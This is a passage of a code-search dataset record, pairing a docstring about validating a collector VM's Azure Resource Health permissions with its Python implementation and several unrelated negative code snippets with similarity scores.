"def __init__(self, conf={}, rcfile=None, loglevel=_loglevel_):\n defaultrc = \"\"\"\\\n[nuxeo_account]\nuser = Administrator\npassword = Administrator\n\n[rest_api]\nbase = http://localhost:8080/nuxeo/site/api/v1\nX-NXDocumentProperties = dublincore\n\"\"\"\n config = configparser.ConfigParser()\n # first level of defaults hardcoded above\n config.read_string(defaultrc)\n # then, check for an rcfile supplied by the caller\n if rcfile:\n config.read_file(rcfile)\n # otherwise, check a default path in user directory\n elif not(rcfile) and os.path.isfile(expanduser('~/.pynuxrc')):\n config.read(expanduser('~/.pynuxrc'))\n\n token_auth = bool(\n config.has_option('nuxeo_account', 'method') and\n config.get('nuxeo_account', 'method') == 'token')\n\n token = None\n if config.has_option('nuxeo_account', 'X-Authentication-Token'):\n token = config.get('nuxeo_account', 'X-Authentication-Token')\n\n # these are the defaults from the config\n defaults = {\n \"auth_method\":\n 'token' if token_auth else 'basic',\n \"user\":\n config.get('nuxeo_account', 'user'),\n \"password\":\n config.get('nuxeo_account', 'password'),\n \"api\":\n config.get('rest_api', 'base'),\n \"X-NXDocumentProperties\":\n config.get('rest_api', 'X-NXDocumentProperties'),\n \"X-Authentication-Token\":\n token,\n }\n self.conf = {}\n self.conf.update(defaults)\n # override the defaults based on conf pased in by caller\n self.conf.update(conf)\n\n if config.has_section('ezid'):\n self.ezid_conf = {\n \"host\":\n config.get('ezid', 'host'),\n \"username\":\n config.get('ezid', 'username'),\n \"password\":\n config.get('ezid', 'password'),\n \"shoulder\":\n config.get('ezid', 'shoulder'),\n }\n\n # auth and headers for the request object\n self.document_property_headers = {\n 'X-NXDocumentProperties': self.conf['X-NXDocumentProperties']\n }\n if self.conf['auth_method'] == 'token':\n self.document_property_headers.update({\n 'X-Authentication-Token':\n self.conf['X-Authentication-Token']\n })\n self.auth = None\n else:\n self.auth = (self.conf[\"user\"], self.conf[\"password\"])\n\n # set debugging level\n numeric_level = getattr(logging, loglevel, None)\n if not isinstance(numeric_level, int):\n raise ValueError('Invalid log level: %s' % loglevel)\n logging.basicConfig(\n level=numeric_level, )\n # log some stuff\n self.logger = logging.getLogger(__name__)\n self.logger.info(\"init Nuxeo object\")\n redacted = self.conf\n redacted.update({'password': '...redacted...'})\n self.logger.debug(redacted)\n\n # implement retry strategy\n # https://findwork.dev/blog/advanced-usage-python-requests-timeouts-retries-hooks/#retry-on-failure\n retry_strategy = Retry(\n total=3,\n status_forcelist=[413, 429, 500, 502, 503, 504],\n)\n adapter = HTTPAdapter(max_retries=retry_strategy)\n self.http = requests.Session()\n self.http.mount(\"https://\", adapter)\n self.http.mount(\"http://\", adapter)",
"def _load_from_conf(self, parser, section, db, conf_dir, cloud_confs, conf_file):\n\n iaas = config_get_or_none(parser, section, \"iaas\", self.iaas)\n iaas_url = config_get_or_none(parser, section, \"iaas_url\", self.iaas_url)\n\n sshkey = config_get_or_none(parser, section, \"sshkeyname\", self.keyname)\n localssh = config_get_or_none(parser, section, \"localsshkeypath\", self.localkey)\n ssh_user = config_get_or_none(parser, section, \"ssh_username\", self.username)\n scp_user = config_get_or_none(parser, section, \"scp_username\", self.scp_username)\n bootconf = config_get_or_none(parser, section, \"bootconf\", self.bootconf)\n bootpgm = config_get_or_none(parser, section, \"bootpgm\", self.bootpgm)\n bootpgm_args = config_get_or_none(parser, section, \"bootpgm_args\", self.bootpgm_args)\n hostname = config_get_or_none(parser, section, \"hostname\", self.hostname)\n readypgm = config_get_or_none(parser, section, \"readypgm\", self.readypgm)\n readypgm_args = config_get_or_none(parser, section, \"readypgm_args\", self.readypgm_args)\n iaas_key = config_get_or_none(parser, section, \"iaas_key\", self.iaas_key)\n iaas_secret = config_get_or_none(parser, section, \"iaas_secret\", self.iaas_secret)\n securitygroups = config_get_or_none(parser, section, \"securitygroups\", self.securitygroups)\n\n terminatepgm = config_get_or_none(parser, section, \"terminatepgm\", self.terminatepgm)\n terminatepgm_args = config_get_or_none(parser, section, \"terminatepgm_args\", self.terminatepgm_args)\n\n pgm_timeout = config_get_or_none(parser, section, \"pgm_timeout\", self.pgm_timeout)\n\n local_exe = config_get_or_none_bool(parser, section, \"local_exe\", self.local_exe)\n\n\n allo = config_get_or_none(parser, section, \"allocation\", self.allocation)\n image = config_get_or_none(parser, section, \"image\", self.image)\n cloudconf = config_get_or_none(parser, section, \"cloud\")\n if cloudconf:\n try:\n conf = cloud_confs[cloudconf]\n except:\n raise APIUsageException(\"%s is not a valud cloud description in this plan\" % (cloudconf))\n\n if not iaas:\n iaas = conf.iaas\n if not iaas_url:\n iaas_url = conf.iaas_url\n if not sshkey:\n sshkey = conf.sshkey\n if not localssh:\n localssh = conf.localssh\n if not ssh_user:\n ssh_user = conf.ssh_user\n if not scp_user:\n scp_user = conf.scp_user\n if not iaas_key:\n iaas_key = conf.iaas_key\n if not iaas_secret:\n iaas_secret = conf.iaas_secret\n if not securitygroups:\n securitygroups = conf.securitygroups\n\n if not iaas:\n iaas = db.default_iaas\n if not iaas_url:\n iaas_url = db.default_iaas_url\n if not allo:\n allo = db.default_allo\n if not sshkey:\n sshkey = db.default_sshkey\n if not localssh:\n localssh = db.default_localssh\n if not ssh_user:\n ssh_user = db.default_ssh_user\n if not scp_user:\n scp_user = db.default_scp_user\n if not iaas_key:\n iaas_key = db.default_iaas_key\n if not iaas_secret:\n iaas_secret = db.default_iaas_secret\n if not securitygroups:\n securitygroups = db.default_securitygroups\n if not image:\n image = db.default_image\n if not bootconf:\n bootconf = db.default_bootconf\n if not bootpgm:\n bootpgm = db.default_bootpgm\n if not bootpgm_args:\n bootpgm_args = db.default_bootpgm_args\n if not readypgm:\n readypgm = db.default_readypgm\n if not readypgm_args:\n readypgm_args = db.default_readypgm_args\n if not terminatepgm:\n terminatepgm = db.default_terminatepgm\n if not terminatepgm_args:\n terminatepgm_args = db.default_terminatepgm_args\n if not pgm_timeout:\n pgm_timeout = db.default_pgm_timeout\n\n if not local_exe:\n local_exe = db.default_local_exe\n\n\n self.image = image\n self.bootconf = _resolve_file_or_none(conf_dir, bootconf, conf_file)\n self.bootpgm = _resolve_file_or_none(conf_dir, bootpgm, conf_file, has_args=True)\n self.bootpgm_args = bootpgm_args\n self.terminatepgm = _resolve_file_or_none(conf_dir, terminatepgm, conf_file, has_args=True)\n self.terminatepgm_args = terminatepgm_args\n self.pgm_timeout = pgm_timeout\n self.local_exe = local_exe\n\n self.hostname = hostname\n self.readypgm = _resolve_file_or_none(conf_dir, readypgm, conf_file, has_args=True)\n self.readypgm_args = readypgm_args\n self.username = ssh_user\n self.scp_username = scp_user\n self.localkey = _resolve_file_or_none(conf_dir, localssh, conf_file)\n self.keyname = sshkey\n self.allocation = allo\n self.iaas = iaas\n self.iaas_url = iaas_url\n\n self.iaas_secret = iaas_secret\n self.iaas_key = iaas_key\n self.securitygroups = securitygroups\n\n x = config_get_or_none(parser, section, \"iaas_launch\")\n if x:\n if x.lower() == 'true':\n self.iaas_launch = True\n else:\n self.iaas_launch = False\n else:\n if self.hostname:\n self.iaas_launch = False\n else:\n self.iaas_launch = True\n\n # allow the plan to over ride the default image if they want to use a hostname\n if self.iaas_launch is False:\n self.image = None\n\n item_list = parser.items(section)\n deps_list = []\n for (ka,val) in item_list:\n ndx = ka.find(\"deps\")\n if ndx == 0:\n deps_list.append(ka)\n deps_list.sort()\n for i in deps_list:\n deps = config_get_or_none(parser, section, i)\n deps_file = _resolve_file_or_none(conf_dir, deps, conf_file)\n if deps_file:\n parser2 = ConfigParser.ConfigParser()\n parser2.read(deps_file)\n keys_val = parser2.items(\"deps\")\n for (ka,val) in keys_val:\n val2 = config_get_or_none(parser2, \"deps\", ka)\n if val2 is not None:\n bao = BagAttrsObject(ka, val2)\n self.attrs.append(bao)"
] |
[
"0.5799087",
"0.54309773",
"0.5396221",
"0.5391791",
"0.52264905",
"0.51209015",
"0.51099086",
"0.50692695",
"0.5065538",
"0.5049415",
"0.5032216",
"0.50267226",
"0.5001072",
"0.4963002",
"0.49445188",
"0.49378237",
"0.49344987",
"0.49096617",
"0.48961362",
"0.48803616",
"0.48683947",
"0.48217174",
"0.48191994",
"0.48125064",
"0.47984332",
"0.4798107",
"0.47896063",
"0.47671095",
"0.4766236",
"0.47589552"
] |
0.63379407
|
0
|
Implementation of abstract method. Validate the collector VM permissions to trigger RH API.
|
def validate(self) -> bool:
# Call RH for the collector VM. If the call is successful, the collector VM has been assigned the right roles.
collectorVM = AzureInstanceMetadataService.getComputeInstance(
self.tracer, self.name)
collectorVMArmId = ARM_ID_TEMPLATE % (
collectorVM[SUBSCRIPTION_ID], collectorVM[RESOURCE_GROUP_NAME], collectorVM[NAME])
rhClient = ResourceHealth(self.tracer)
try:
rhEvents = rhClient.getHistoricalResourceAvailabilityEvents(
self.ctx.authToken, collectorVMArmId)
except Exception as e:
self.tracer.error(
"[%s] RH call validation failed(%s).", self.fullName, e, exc_info=True)
return False
return True
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"async def permission_valid_check(cls):\n pass",
"def check_vulnerability(self):\n\t\tpass",
"def __require_permission_view(self):\n permission = codechecker_api_shared.ttypes.Permission.PERMISSION_VIEW\n if not self.__has_permission(permission):\n raise codechecker_api_shared.ttypes.RequestFailed(\n codechecker_api_shared.ttypes.ErrorCode.UNAUTHORIZED,\n \"You are not authorized to execute this action.\")",
"def validate(self):\n if not self.os_repos:\n raise ValueError(\"No OS repository available for OS {}\".format(\n self.operating_system.name))\n if not self.template:\n raise ValueError(\"No autoinstallation template specified\")\n if not self.installer_template:\n raise ValueError(\"No installer command line template specified\")\n if not self.system_profile._gateway:\n raise ValueError(\"No gateway interface present\")\n\n self.system_profile.hypervisor.validate()\n\n for iface in self.system_profile.ifaces:\n iface.validate()\n\n # verify gateway interface has IP address and gateways\n if not self.system_profile.list_gateway_networks():\n raise ValueError(\n \"Gateway interface {} has no IP address\"\n \" or gateway route\".format(\n self.system_profile._gateway.os_device_name\n ))\n\n # verify that total partition size is not bigger than disk size\n failing_volume_ids = []\n for volume in [volume for volume in self.system_profile.volumes\n if isinstance(volume, (self.DasdVolume,\n self.ZfcpVolume))]:\n total_part_size = sum(\n [partition.size for partition in volume.partitions])\n if total_part_size > volume.size:\n failing_volume_ids.append(str(volume))\n\n if failing_volume_ids:\n raise ValueError(\n \"Partitioning exceeds volume size for volumes {}\".format(\n failing_volume_ids))",
"def _is_accessible_to_all(self, pvm: PermissionView) -> bool:\n\n return pvm.permission.name in self.ACCESSIBLE_PERMS",
"def AssertBasePermission(self, mr):\n servlet_helpers.AssertBasePermission(mr)",
"def _enforce_authorization(self, **kwargs):\n # Get the env\n env_dict = kwargs.get('env')\n\n # Although it may already be set in the env, just override in case it was only set via command line or config\n # Convert to string since execve() (called by Popen in base classes) wants string values.\n env_dict['EG_IMPERSONATION_ENABLED'] = str(self.impersonation_enabled) # TODO - Leave EG_ for kernelspec?\n\n # Now perform authorization checks\n if self.kernel_username in self.unauthorized_users:\n self._raise_authorization_error(\"not authorized\")\n\n # If authorized users are non-empty, ensure user is in that set.\n if self.authorized_users.__len__() > 0:\n if self.kernel_username not in self.authorized_users:\n self._raise_authorization_error(\"not in the set of users authorized\")",
"def _check_permissions(source: Any, info: Info, kwargs: Dict[str, Any]):\n for permission_class in self.permission_classes:\n permission = permission_class()\n\n if not permission.has_permission(source, info, **kwargs):\n message = getattr(permission, \"message\", None)\n raise PermissionError(message)",
"def DeniedPermissions(self) -> _n_6_t_0:",
"def validate(self):\n AcceleratorType.validate(self.accelerator_type)\n gcp.validate_machine_configuration(self.cpu_cores,\n self.memory,\n self.accelerator_type,\n self.accelerator_count)",
"def validate_approver(self, request):\n\n if not handler.dataHelper.check_admin_approver(request.session['id']):\n handler.logHelper.log_it_visit(request, __name__ + '.validate_approver', authorized=False)\n raise PermissionDenied('You cannot access this page!')",
"def RequestedPermissions(self) -> _n_6_t_0:",
"def _validate(self):\n pass",
"def on_model_change(self, form, model, is_created):\n if not current_user.is_active or not current_user.is_authenticated:\n abort(403)\n elif is_created:\n if not user_has_permission(current_user, 'can_create', 'advisorapplicants'):\n abort(403)\n else:\n if not user_has_permission(current_user, 'can_edit', 'advisorapplicants'):\n abort(403)",
"def __validate():\n # TODO: implement",
"def _is_granter_pvm( # pylint: disable=no-self-use\n self, pvm: PermissionView\n ) -> bool:\n\n return pvm.permission.name in {\"can_override_role_permissions\", \"can_approve\"}",
"def _check_groups_kvm():\n if not _user_belongs_to('libvirtd') and not _user_belongs_to('kvm'):\n _raise_group_error('kvm')",
"def __validate(self):\n pass",
"def on_model_change(self, form, model, is_created):\n if not current_user.is_active or not current_user.is_authenticated:\n abort(403)\n elif is_created:\n if not user_has_permission(current_user, 'can_create', 'advisors'):\n abort(403)\n else:\n if not user_has_permission(current_user, 'can_edit', 'advisors'):\n abort(403)",
"def validate(self, data):\n\t\tvalidated_data = super(BoxSerializer, self).validate(data)\n\t\tuser = self.context['request'].user\n\t\tcheck_constraint_util = CheckConstraintsUtil(user, validated_data, self.instance) \n\t\treturn check_constraint_util.check_constraints()",
"def __init__(self):\n\n self._authorize()",
"def initial(self, request, *args, **kwargs):\n\n # It's checks the permissions for the third party endpoint or not. It give access if key present.\n bool_value, message = self.check_api_keys(request)\n if bool_value:\n super(ProjectRestrictedGenericViewSet, self).initial(request, *args, **kwargs)\n # Check action permissions\n self.check_action_permissions(request)\n else:\n self.app_permission_denied(request, message)",
"def _check_validity(self):\n pass",
"def test_call_bad_perms(self):\r\n self.assertRaises(ValueError, self.cs_overview, -1)",
"def check_permission():\n if IS_ADMIN:\n out_info(\"Running as Root/Admin\")\n else:\n out_warning(\"Running without root/admin privileges\")",
"def on_model_change(self, form, model, is_created):\n if not current_user.is_active or not current_user.is_authenticated:\n abort(403)\n elif is_created:\n if not user_has_permission(current_user, 'can_create','admins'):\n abort(403)\n else:\n if not user_has_permission(current_user, 'can_edit','admins'):\n abort(403)",
"def _is_admin_pvm(self, pvm: PermissionView) -> bool:\n\n return not self._is_user_defined_permission(pvm)",
"def validate(self):\n if not self.keys:\n raise ValueError(\"Virtual host missing keys\")\n for i in self.keys:\n i.validate()",
"def on_model_change(self, form, model, is_created):\n if not current_user.is_active or not current_user.is_authenticated:\n abort(403)\n elif is_created:\n if not user_has_permission(current_user, 'can_create','roles'):\n abort(403)\n else:\n if not user_has_permission(current_user, 'can_edit','roles'):\n abort(403)",
"def validate(self):\n raise NotImplementedError"
] |
[
"0.6178343",
"0.59988725",
"0.5770928",
"0.57393557",
"0.56788474",
"0.56340134",
"0.5534252",
"0.55060536",
"0.55051845",
"0.5490519",
"0.54623586",
"0.54542404",
"0.5446576",
"0.5435001",
"0.54199827",
"0.5419372",
"0.54152685",
"0.54123425",
"0.541165",
"0.54085827",
"0.53807825",
"0.53722566",
"0.5371619",
"0.5360214",
"0.53454715",
"0.533925",
"0.5333318",
"0.5331246",
"0.53227735",
"0.53150177"
] |
0.74354815
|
0
|
Abstract method implementation to generate the json string for the results to push to LA.
|
def generateJsonString(self) -> str:
try:
if self.lastResult is not None and len(self.lastResult) != 0:
for result in self.lastResult:
result['SAPMON_VERSION'] = PAYLOAD_VERSION
result['PROVIDER_INSTANCE'] = self.providerInstance.name
result['METADATA'] = self.providerInstance.metadata
resultJsonString = json.dumps(
self.lastResult, sort_keys=True, indent=4, cls=JsonEncoder)
self.tracer.debug("[%s] resultJson=%s" % (self.fullName,
str(resultJsonString)))
except Exception as e:
self.tracer.error("[%s] Could not format lastResult=%s into JSON (%s)", self.fullName,
self.lastResult,
e, exc_info=True)
raise
return resultJsonString
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def format_json(self,query_results):\n results=query_results.data\n factory=factory_json()\n dump=factory.dumps(results)\n print(dump)\n # TODO return output for this\n return \"\"",
"def get_json_string(self, **kwargs):\n ...",
"def json(self):\n robot_dict = self.robot_dict()\n target_dict = self.target_dict()\n json_str = '{'\n json_str = json_str + '\"robot_obj\" : ' + json.dumps(robot_dict) + \",\\n\"\n json_str = json_str + '\"target_obj\" : ' + json.dumps(target_dict) + \"\\n\"\n json_str = json_str + '}'\n return(json_str)",
"def as_json(self):",
"def json_all_builder(self, customer_count, invoice_count, invl_count ):\n json_result = '{\\n'\n json_result += '\\t \"_results\":[\\n'\n json_result += '\\t\\t{ \"customer_count\": \"' + str(customer_count)\n json_result += ', \"invoice_count\": \"' + str(invoice_count)\n json_result += ', \"invl_count\": \"' + str(invl_count)\n json_result += '}\\n'\n json_result += '\\n\\t]\\n}'\n return json_result",
"def json_friendly(self):",
"def to_json(self):\n pass",
"def getJSON(self):\n text = super().getJSON() + f', \"exchange\": \"{self.__exchange}\"'\n text += f', \"market pair\": \"{self.__market_pairs}\"'\n text += f', \"interval\": \"{self.__interval}\"}}'\n return text",
"def get_json_accessibility_result(self):\n axe_result = json.dumps(self.results, indent = 3)\n logger.info(axe_result)\n return axe_result",
"def json_view(self, recursive=False):\n\n context = self.context.aq_inner\n data = self.export(context, recursive=recursive)\n pretty = json.dumps(data, sort_keys=True, indent=4)\n self.request.response.setHeader(\"Content-type\", \"application/json\")\n return pretty",
"def display_json(self, results, verbose):\n print(json.dumps(results))",
"def __str__(self):\n\t\treturn json.dumps(self.json)",
"def json(self):\n class ExtendedJSONEncoder(json.JSONEncoder):\n def default(self, obj):\n if isinstance(obj, datetime.date) or isinstance(obj, datetime.time):\n encoded_object = obj.isoformat()\n else:\n encoded_object = json.JSONEncoder.default(self, obj)\n return encoded_object\n\n obj = {\n 'operation': self.operation,\n 'version': self.version,\n 'language': self.language,\n 'identifiers': self.identifiers,\n 'store_execute': self.store_execute,\n 'status': self.status,\n 'lineage': self.lineage,\n 'inputs': dict((i, [inpt.json for inpt in self.inputs[i]]) for i in self.inputs),\n 'outputs': self.outputs,\n 'raw': self.raw\n }\n\n return json.dumps(obj, allow_nan=False, cls=ExtendedJSONEncoder)",
"def to_json_string(self) -> None:\n return json.dumps(dataclasses.asdict(self)) + \"\\n\"",
"def _json(self, data):\n if len(data) == 0:\n return \"\"\n if self.meta:\n data['meta_history'] = [{'prog': __prog__,\n 'release': __release__,\n 'author': __author__,\n 'date': __now__},]\n return json.dumps(data) + \"\\n\"",
"def to_json_string(self):\n\t\treturn json.dumps(dataclasses.asdict(self), indent=2, sort_keys=True) + \"\\n\"",
"def get_json(self):\n json_item = {\"id: \": self.id,\n \"question: \": self.question,\n \"documents: \": self.documents,\n \"document_ids: \": self.document_ids,\n \"gold answers: \": self.gold}\n return json_item",
"def report_json(self):\n # type: () -> Optional[AnyStr]\n return json.dumps(self.gen_report(as_dict=True), indent=4)",
"def to_json(self, exclude_vectors=True):\n json_repr = vars(self)\n json_repr[\"results\"] = [\n r.to_json(exclude_vectors=exclude_vectors) for r in json_repr[\"results\"]]\n return json_repr",
"def __str__(self) -> str:\n obj_dict: Dict[str, Any] = {}\n obj_dict[\"doc\"] = self.doc\n obj_dict[\"type\"] = self.type\n obj_dict[\"name\"] = self.name\n\n line_range = self.line_range()\n obj_dict[\"start_line\"] = line_range[0]\n obj_dict[\"end_line\"] = line_range[1]\n\n obj_dict[\"children\"] = []\n\n for child in self.children.values():\n obj_dict[\"children\"].append(json.loads(str(child)))\n\n return json.dumps(obj_dict)",
"def json(self):\r\n return {\"id\": self.id, \"code\": self.code, \"description\": self.description, \"xCoor\": self.x_coor, \"yCoor\": self.y_coor, \"latitude\": self.latitude,\r\n \"longitude\": self.longitude, \"waterschapId\": self.waterschap_id, \"watertypeId\": self.watertype_id, \"watertypeKrwId\": self.watertype_krw_id}",
"def GetJSON(self):\n return json.dumps(self.GetDict())",
"def encode(self):\n return json.dumps(self.get_data(), indent=4)",
"def generate(self, sorted=False):\n json_result = json.dumps(self.generate_dict(), sort_keys=sorted)\n return json_result",
"def to_json(self) -> JSON:\n pass",
"def to_json(self, names):\n raise Exception('Cannot run abstract method.')",
"def to_json(self, names):\n raise Exception('Cannot run abstract method.')",
"def to_json(self):\n return json.dumps(\n {\n \"long_url\": self.long_url,\n \"special_code\": str(self.special_code),\n \"stub\": self.stub,\n }\n )",
"def to_json_string(self):\n\t\treturn json.dumps(self.to_dict(), indent=2, sort_keys=True) + \"\\n\"",
"def __repr__(self):\n result = json.dumps({'processed': self._processed,\n 'failed': self._failed,\n 'total': self._total,\n 'time': str(self._time),\n 'chunk': self._chunk})\n return result"
] |
[
"0.7380562",
"0.6979047",
"0.6829505",
"0.6711398",
"0.6708633",
"0.6640155",
"0.64915836",
"0.64715326",
"0.6465525",
"0.6458256",
"0.642514",
"0.6387305",
"0.6366938",
"0.6351204",
"0.6293009",
"0.6289616",
"0.6279474",
"0.6252944",
"0.62293446",
"0.62089664",
"0.61992306",
"0.61967945",
"0.61960185",
"0.619015",
"0.6184949",
"0.61814266",
"0.61814266",
"0.6181295",
"0.61801666",
"0.6169753"
] |
0.73502034
|
1
|
Compile the Azure resources from global state and get RH events for those resources.
|
def _actionGetRHEvents(self):
self.lastResult = []
self.pollingState = self.state.get(POLLING_STATE, {})
# Get resources for which AIOps is enabled.
resources = self.__compileAIOpsEnabledResources()
self.tracer.info("[%s] There are %s resources compiled for fetching RH events and they are %s" % (
self.fullName, len(resources), resources))
# Get an iterator for the resources. Using iterator ensures that we loop over the resources list only once while submitting to the threadpoolexecutor.
resourcesIterator = iter(resources)
# Initialize a threadpoolexecutor to parallelize RH calls. Using with statement to ensure clean up of threadpoolexecutor object.
with ThreadPoolExecutor(NUMBER_OF_RH_THREADS) as executor:
# Schedule the first N calls. Not scheduling them all at once, to avoid consuming excessive amounts of memory.
futures = {
executor.submit(self.__getRHEventsAndUpdateResult, resource): resource
for resource in itertools.islice(resourcesIterator, NUMBER_OF_RH_THREADS)
}
while futures:
# Wait for a call to complete.
completedFutures, futures = wait(
futures, timeout=MAX_TIMEOUT, return_when=FIRST_COMPLETED
)
# Schedule the next set of calls based on the number of completed calls. There shouldn't be more than NUMBER_OF_RH_THREADS calls in the pool at a time, to keep memory consumption down.
for resource in itertools.islice(resourcesIterator, len(completedFutures)):
futures.add(
executor.submit(
self.__getRHEventsAndUpdateResult, resource)
)
self.tracer.info("[%s] The number of health events compiled = %s" % (
self.fullName, len(self.lastResult)))
self.updateState()
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def __getRHEventsAndUpdateResult(self, resource: Dict[str, str]) -> None:\n # Validate the state data.\n self.__validateResourceStateEntry(resource)\n\n self.tracer.info(\"[%s] Fetching the RH events for resource = %s\" % (\n self.fullName, resource[AZ_RESOURCE_ID]))\n\n # Extract the polling state for the current resource.\n resourcePollingState = self.pollingState.get(\n resource[AZ_RESOURCE_ID], {})\n\n self.tracer.info(\"[%s] polling state for resource with Id = %s is %s\" % (\n self.fullName, resource[AZ_RESOURCE_ID], resourcePollingState))\n\n rcaPollingState = resourcePollingState.get(RCA, [])\n self.tracer.info(\"[%s] RCA polling state for resource with Id = %s is %s\" % (\n self.fullName, resource[AZ_RESOURCE_ID], rcaPollingState))\n\n # Parse the minimum time. datetime.min can't be used as the year is not formatted with zero padding.\n datetimeMin = datetime.strptime(MIN_DATETIME, OCCURED_TIME_FORMAT[0])\n\n # Fetch the occuredTime of the last record that was pushed to LA for the given resource.\n lastOccuredTime = resourcePollingState.get(\n LAST_OCCURED_TIME, datetimeMin)\n self.tracer.info(\"[%s] lastOccuredTime from polling state for resource with Id = %s is %s\" % (\n self.fullName, resource[AZ_RESOURCE_ID], lastOccuredTime))\n\n # Variable to store updated occuredTime in case new health events are obtained from RH.\n updatedLastOccuredTime = lastOccuredTime\n\n try:\n rhEvents = self.rhClient.getHistoricalResourceAvailabilityEvents(\n self.providerInstance.ctx.authToken, resource[AZ_RESOURCE_ID])\n self.tracer.info(\"[%s] number of RH events received = %s; resourceId=%s; numberOfEventsCompiledForAllResourcesSoFar=%s\" % (\n self.fullName, len(rhEvents), resource[AZ_RESOURCE_ID], len(self.lastResult)))\n numberOfNewEvents = 0\n rhEventIds = []\n for event in rhEvents:\n hasRca = False\n rhEventIds.append(event[ID])\n currentOccuredTime = self.__parseOccuredTime(\n event[PROPERTIES][OCCURED_TIME])\n\n # Update the lastOccuredTime which can be stored in the state file for the current resource.\n if currentOccuredTime > updatedLastOccuredTime:\n updatedLastOccuredTime = currentOccuredTime\n\n # Check if the event has been previously processed using the occuredTime.\n # This will occur because the health events are obtained for the last one day and the polling frequency is 15 minutes.\n # In case the event has RCA, the event will have the same occuredTime as the transition event for the same issue. Additional checks are required.\n if currentOccuredTime <= lastOccuredTime:\n if self.__isNotRcaEvent(event):\n # Skip this event. This has already been processed.\n continue\n else:\n # This is an RCA event.\n eventTitle = event[PROPERTIES][TITLE] if TITLE in event[PROPERTIES] else None\n self.tracer.info(\"[%s] RCA event older than lastOccuredTime received for resourceId=%s; RH event id=%s; title=%s\" % (\n self.fullName, resource[AZ_RESOURCE_ID], event[ID], eventTitle))\n hasRca = True\n if event[ID] in rcaPollingState:\n # Skip this event. The RCA event has been processed before.\n continue\n\n # New RCA event has been received. Add it to the state variable.\n rcaPollingState.append(event[ID])\n\n numberOfNewEvents += 1\n # Sanitize the data and add additional data related to the resource. HTML tags are converted to markdown format and action tags are removed.\n sanitizedEvent = self.__sanitizeEvent(event, resource, hasRca)\n\n self.lastResult.extend([sanitizedEvent])\n\n self.tracer.info(\"[%s] resourceId=%s; number of RH events received = %s; numberOfNewEvents=%s; updatedLastOccuredTime=%s\" % (\n self.fullName, resource[AZ_RESOURCE_ID], len(rhEvents), numberOfNewEvents, updatedLastOccuredTime))\n\n # Clean up rcaPollingState to remove the stale entries.\n rcaEventCountBeforeCleanUp = len(rcaPollingState)\n rcaPollingState = self.__cleanRcaPollingState(\n rhEventIds, rcaPollingState)\n self.tracer.info(\"[%s] resourceId=%s; rcaEventCountBeforeCleanUp = %s; rcaEventCountAfterCleanUp=%s\" % (\n self.fullName, resource[AZ_RESOURCE_ID], rcaEventCountBeforeCleanUp, len(rhEvents)))\n\n # Update the values for the current resource in the shared state dictionary.\n self.pollingState[resource[AZ_RESOURCE_ID]] = {\n LAST_OCCURED_TIME: updatedLastOccuredTime, LAST_RUN_TIMESTAMP: datetime.now(), RCA: rcaPollingState}\n\n except Exception as e:\n self.tracer.error(\n \"[%s] Failed to get RH events and update the result for the resource with azResourceId=%s. numberOfEventsCompiledForAllResourcesSoFar=%s (%s)\", self.fullName, resource[AZ_RESOURCE_ID], len(self.lastResult), e, exc_info=True)",
"def gen_resources(self):\n\n print \"\\t* Adding resources to compute template\"\n\n # add all the nets and subnets\n self.gen_net_resources()\n\n # add all routers\n self.gen_router_resources()\n\n # add all servers/intances\n self.gen_server_resources()",
"def set_resources():\n global available_resources\n global EdgenodeResources\n recv_json = request.get_json()\n for resourcename, value in recv_json.items():\n available_resources[resourcename] = value\n # TODO make this better\n EdgenodeResources = [TaskResources(ram=int(available_resources['RAM']), cpu=int(\n available_resources['CPU']), hdd=int(available_resources['HDD'])), available_resources['DATA']]\n\n print 'Available resources set to', EdgenodeResources\n return 'Available resources set to ' + str(available_resources)",
"def get_resources():\r\n global __res\r\n if __res == None:\r\n __init_resources()\r\n return __res",
"def get_resources():\r\n global __res\r\n if __res == None:\r\n __init_resources()\r\n return __res",
"def get_resources():\r\n global __res\r\n if __res == None:\r\n __init_resources()\r\n return __res",
"def get_resources():\n global __res\n if __res == None:\n __init_resources()\n return __res",
"def get_resources():\n global __res\n if __res == None:\n __init_resources()\n return __res",
"def get_resources():\n global __res\n if __res == None:\n __init_resources()\n return __res",
"def resources(self):",
"def test_load_response_descriptor_events_event_event_resource_spaces(self):\n pass",
"def process_resource_listing(self, resources, context):\n pass",
"def events(self):\r\n return resources.Events(self)",
"def resource_mapping():\n return {\n 'OS::Heat::ResourceChain': ResourceChain,\n }",
"def pop_resources(self):\n resources = self.request_local.resources\n self.request_local.resources = {}\n # deal with aggregated resources\n if resources and \"head\" in resources:\n # This is lazy, because we otherwise run\n # into circular import issues\n if self.aggregation_config is not None:\n self._setup_aggregation_mapping()\n\n\n if self.aggregated_js_mapping:\n self._replace_resources_with_aggregates(resources,\n self.aggregated_js_mapping,\n JSLink,\n )\n if self.aggregated_css_mapping:\n self._replace_resources_with_aggregates(resources,\n self.aggregated_css_mapping,\n CSSLink,\n )\n return resources",
"def create_resources(self) -> List[ResourceDescription]:\r\n return self.resources",
"def _load_resources(self):\n puts = (getattr(self, 'project', None) or self).puts\n for resource_type, resource_cls in six.iteritems(AVAILABLE_RESOURCES):\n for name in self.settings.get(resource_type, {}):\n extra = {\n 'project': getattr(self, 'project', None) or self,\n 'app': self if hasattr(self, 'project') else None,\n }\n\n with indent(4 if hasattr(self, 'project') else 2):\n puts(colored.green(u\"✓ {}:{}\".format(resource_type, name)))\n\n self._resources[resource_type].append(\n resource_cls.factory(\n name=name,\n settings=self.settings.get(resource_type, {})[name],\n **extra\n )\n )",
"def build_resource(self, *args, **kwargs):\r\n r = {}\r\n for current_resource in self.resources:\r\n item = self._get_resource(\r\n repo=self.current_repo, owner=self.owner, \r\n resource=current_resource, **kwargs\r\n )\r\n if not item: continue\r\n r[current_resource] = item\r\n\r\n return r",
"def resources(self):\n return self.__resources",
